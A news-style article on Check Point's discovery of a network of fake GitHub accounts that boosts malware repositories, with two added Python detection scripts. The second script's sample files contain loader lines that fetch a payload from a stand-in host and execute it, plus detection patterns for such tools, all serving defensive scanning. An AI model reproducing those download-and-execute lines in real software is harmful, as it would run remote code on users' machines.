A secret network of around 3,000 “ghost” accounts on GitHub has been discovered manipulating the code-hosting platform to promote malware and phishing links. Recent research conducted by cybersecurity firm Check Point exposed the activities of a cybercriminal the researchers have named “Stargazer Goblin.”
Since June 2023 or even earlier, Stargazer Goblin has been active on Microsoft-owned GitHub, the world’s largest open-source code repository. The site hosts millions of developers’ projects, and Stargazer Goblin has been using its community tools to boost malicious code repositories’ visibility and perceived legitimacy.
Antonis Terefos, a malware reverse engineer at Check Point who uncovered this network, highlighted the sophistication of the operation. He noted that while GitHub has been targeted by cybercriminals before, the scale and method of this operation are unprecedented.
Repositories and stars are bought and sold through a cybercrime-linked Telegram channel and various criminal marketplaces. Telegram is commonly used by cybercriminals, their clients, and their victims. Terefos said he has never seen this kind of network of fake accounts operating like this on GitHub.
Check Point calls the operation the “Stargazers Ghost Network.” It spreads malware disguised as legitimate tools for social media, gaming, and cryptocurrency applications; examples included repositories offering VPN clients or licensing tools for software such as Adobe Photoshop. Such repositories target Windows users who are searching for free software online.
The network charges other hackers to use its services. Check Point has identified various types of malware distributed through this network, including the Atlantida Stealer, Rhadamanthys, and Lumma Stealer. Terefos discovered the network while digging into instances of the Atlantida Stealer.
Stargazer Goblin places ads on cybercrime forums, and its Telegram channel offers services such as 100 stars for $10 and 500 stars for $50. It also offers to clone existing repositories and provide trusted accounts. Check Point’s research indicates that the network may have started these activities as early as August 2022 and could have collected up to $100,000 since then. From mid-May to mid-June this year alone, the operator reportedly made around $8,000.
Terefos has observed legitimate repositories being hijacked and transformed into malicious ones using stolen credentials. The malicious code could be further propagated if legitimate users fork these compromised repositories. Automated tools help Terefos identify accounts linked to the network by recognizing common features, such as similar templates and tags.
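The account-clustering described above can be sketched in code. The following is an added example, not Check Point's tooling or GitHub's detection logic, and it runs on constructed sample data: three repositories with README text, topic tags, and stargazer profiles (the account fields a scrape of the GitHub API would return). It treats "similar templates and tags" as overlap between normalized README lines and topics, and adds the two star signals the article implies: a star base made up of bare profiles created in a burst, and the same pool of accounts recurring across repositories. The thresholds (0.6 similarity, half the stargazers bare) and all names are illustrative assumptions, not published figures.

```python
import re
from collections import Counter, defaultdict


def acct(login, created, public_repos, followers):
    """Stargazer record with the profile fields a GitHub API scrape would return."""
    return {"login": login, "created": created,
            "public_repos": public_repos, "followers": followers}


# Constructed sample data: none of the accounts, repositories or URLs are real.
GHOSTS = [acct(f"ghost0{i}", "2024-05", 0, 0) for i in range(1, 6)]
ALICE = acct("devalice", "2019-03", 12, 40)
BOB = acct("devbob", "2017-11", 30, 210)
CAROL = acct("devcarol", "2021-06", 5, 9)

# Lure README body reused across clones; only title, blurb and URL change.
LURE = ("## Features\n- Works on Windows 10 and 11\n- No installation required\n"
        "## Download\nLink: {url}\nArchive password: 1234\n"
        "## Install\nDisable your antivirus before running setup.exe\n")

REPOS = {
    "user1/photoshop-license-tool": {
        "topics": ["free", "windows", "crack", "download"],
        "readme": "# Photoshop License Tool 2024\nFree activator for Adobe Photoshop.\n"
                  + LURE.format(url="https://example.invalid/dl/7731"),
        "stargazers": GHOSTS[:4] + [ALICE],
    },
    "user2/free-vpn-client": {
        "topics": ["free", "windows", "vpn", "download"],
        "readme": "# Free VPN Client 2024\nUnlimited free VPN for Windows.\n"
                  + LURE.format(url="https://example.invalid/dl/9920"),
        "stargazers": GHOSTS[:3] + [GHOSTS[4]],
    },
    "org/fastparse": {
        "topics": ["json", "parser", "python"],
        "readme": "# fastparse\nA streaming JSON parser.\n## Install\n"
                  "pip install fastparse\n## Usage\nSee docs/ for examples.\n",
        "stargazers": [ALICE, BOB, CAROL, GHOSTS[0]],
    },
}


def fingerprint(repo):
    """Normalized README lines plus topic tags, so clones that differ only in
    product name, version number and download URL still overlap heavily."""
    tokens = set()
    for line in repo["readme"].splitlines():
        line = re.sub(r"https?://\S+", "<url>", line)
        line = re.sub(r"\d+", "<n>", line).strip().lower()
        if line:
            tokens.add(line)
    tokens.update("topic:" + t.lower() for t in repo["topics"])
    return tokens


def jaccard(a, b):
    return len(a & b) / len(a | b) if a | b else 0.0


def template_pairs(repos, threshold=0.6):
    """Repository pairs whose fingerprints overlap at or above the threshold."""
    names = sorted(repos)
    pairs = []
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            score = jaccard(fingerprint(repos[a]), fingerprint(repos[b]))
            if score >= threshold:
                pairs.append((a, b, round(score, 2)))
    return pairs


def is_bare(account):
    """A profile that stars repositories but owns no repos and has no followers."""
    return account["public_repos"] == 0 and account["followers"] == 0


def star_profile(repo):
    """Share of bare stargazers, and share created in the single busiest month."""
    stars = repo["stargazers"]
    if not stars:
        return {"bare_ratio": 0.0, "burst_ratio": 0.0}
    bare = sum(is_bare(a) for a in stars) / len(stars)
    burst = Counter(a["created"] for a in stars).most_common(1)[0][1] / len(stars)
    return {"bare_ratio": round(bare, 2), "burst_ratio": round(burst, 2)}


def shared_stargazers(repos, min_repos=2):
    """Accounts that star several repos in the set; a paid-star pool recurs on
    every customer's repository, while genuine users rarely do."""
    seen = defaultdict(set)
    for name, repo in repos.items():
        for a in repo["stargazers"]:
            seen[a["login"]].add(name)
    return {login: sorted(rs) for login, rs in seen.items() if len(rs) >= min_repos}


def flag_repos(repos, bare_threshold=0.5, template_threshold=0.6):
    """Repos that share a template with another repo AND have a mostly bare star
    base. Either signal alone is weak; together they describe a cloned lure
    boosted by ghost accounts."""
    templated = set()
    for a, b, _ in template_pairs(repos, template_threshold):
        templated.update((a, b))
    return sorted(n for n in templated
                  if star_profile(repos[n])["bare_ratio"] >= bare_threshold)


if __name__ == "__main__":
    print("template pairs:", template_pairs(REPOS))
    for name, repo in REPOS.items():
        print(name, star_profile(repo))
    print("shared stargazers:", shared_stargazers(REPOS))
    print("flagged:", flag_repos(REPOS))
```

On this data the two lure repositories match each other at about 0.65 and have 80-100% bare stargazers all created in the same month, while the parser project shares only a heading with them and keeps a mixed, organically aged star base; the one ghost account that stars all three shows why account overlap is corroboration rather than proof on its own.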
When GitHub identifies an account supporting illegal malware campaigns, it disables those user accounts for violating its Acceptable Use Policies. Alexis Wales, vice president of security operations at GitHub, stated that the company has dedicated teams to detect and remove such content and accounts. These teams use a combination of manual reviews and at-scale detections using machine learning to identify suspicious behavior.
Unfortunately, GitHub is a gigantic target, with over 100 million users and 420 million repositories, which makes it relatively easy for cybercriminals to hide within the user base like a grain of sand on a beach.
Jake Moore, global cybersecurity adviser at security firm Eset, warned GitHub users about the risks of downloading malicious code. Indicators of malicious repositories include unexpected code changes, code accessing external resources, and hard-coded credentials or API keys.
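Two of the three indicators Moore lists can be checked mechanically against a repository snapshot (the third, unexpected code changes, needs commit history and is not covered here). The script below is an added example, not a tool from Eset, Check Point or GitHub; it scans a constructed set of files for hard-coded credentials, fetches from external resources, and dynamic execution of downloaded content, then grades the combination. The regexes cover a few well-known token shapes and download/exec idioms and are assumptions about what a lure repository looks like, not a complete secret scanner; every file, URL and token in the sample is made up.

```python
import re
from collections import Counter

# Constructed repository snapshot (path -> contents). The files, URLs and
# tokens are made up; they imitate the shape of a "free tool" repo whose
# script pulls a second stage from outside GitHub and runs it.
SAMPLE_REPO = {
    "README.md": "# Free VPN Client\nDownload the release zip and run setup.exe\n",
    "vpn_client.py": (
        "import base64, subprocess, urllib.request\n"
        "URL = 'https://example.invalid/dl/stage2.bin'\n"
        "blob = urllib.request.urlopen(URL).read()\n"
        "exec(base64.b64decode(blob))\n"
    ),
    "install.ps1": (
        "Invoke-WebRequest -Uri https://example.invalid/dl/setup.exe "
        "-OutFile $env:TEMP\\setup.exe\n"
        "Start-Process $env:TEMP\\setup.exe\n"
    ),
    "config.py": (
        "GITHUB_TOKEN = 'ghp_" + "A" * 36 + "'\n"
        + "AWS_ACCESS_KEY_ID = 'AKIA" + "B" * 16 + "'\n"
        + "DB_PASSWORD = 'hunter2'\n"
    ),
    "utils.py": "def add(a, b):\n    return a + b\n",
}

# Indicator kinds -> patterns. Token shapes are the public formats of GitHub
# personal access tokens (ghp_ + 36 chars) and AWS access key IDs (AKIA + 16);
# the generic credential rule catches `password = '...'`-style assignments.
INDICATORS = {
    "hardcoded_credential": [
        re.compile(r"ghp_[A-Za-z0-9]{36}"),
        re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
        re.compile(r"(?i)(password|passwd|secret|api[_-]?key|token)\w*\s*[:=]\s*['\"][^'\"]{4,}['\"]"),
    ],
    "external_fetch": [
        re.compile(r"https?://[^\s'\"]+"),
        re.compile(r"(?i)\b(urlopen|requests\.get|Invoke-WebRequest|iwr|curl|wget|DownloadString|DownloadFile)\b"),
    ],
    "dynamic_execution": [
        re.compile(r"\b(exec|eval)\s*\("),
        re.compile(r"(?i)\b(b64decode|FromBase64String)\b"),
        re.compile(r"(?i)\b(Start-Process|subprocess\.(Popen|run|call))\b"),
    ],
}


def scan_repo(files):
    """Return (path, line_no, kind, line) findings; one finding per kind per line."""
    findings = []
    for path in sorted(files):
        for lineno, line in enumerate(files[path].splitlines(), 1):
            for kind, patterns in INDICATORS.items():
                if any(p.search(line) for p in patterns):
                    findings.append((path, lineno, kind, line.strip()))
    return findings


def summarize(findings):
    """Count findings per indicator kind."""
    return Counter(kind for _, _, kind, _ in findings)


def risk_verdict(findings):
    """Fetching from outside the repo and then executing what came back is the
    loader pattern used by stealer lures; credentials alone are sloppy, not malicious."""
    kinds = {kind for _, _, kind, _ in findings}
    if {"external_fetch", "dynamic_execution"} <= kinds:
        return "high"
    if kinds:
        return "review"
    return "clean"


if __name__ == "__main__":
    results = scan_repo(SAMPLE_REPO)
    for path, lineno, kind, line in results:
        print(f"{path}:{lineno} [{kind}] {line}")
    print(dict(summarize(results)), "->", risk_verdict(results))
```

Against the sample, `vpn_client.py` and `install.ps1` each produce a fetch followed by execution, which is what pushes the verdict to "high"; `config.py` alone would only earn "review", since leaked keys are a hygiene problem rather than evidence of a lure.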
Stargazer Goblin’s network might be even broader, as evidenced by a YouTube account sharing malicious links via videos. Terefos emphasizes that the full extent of the network’s operations is still not entirely known.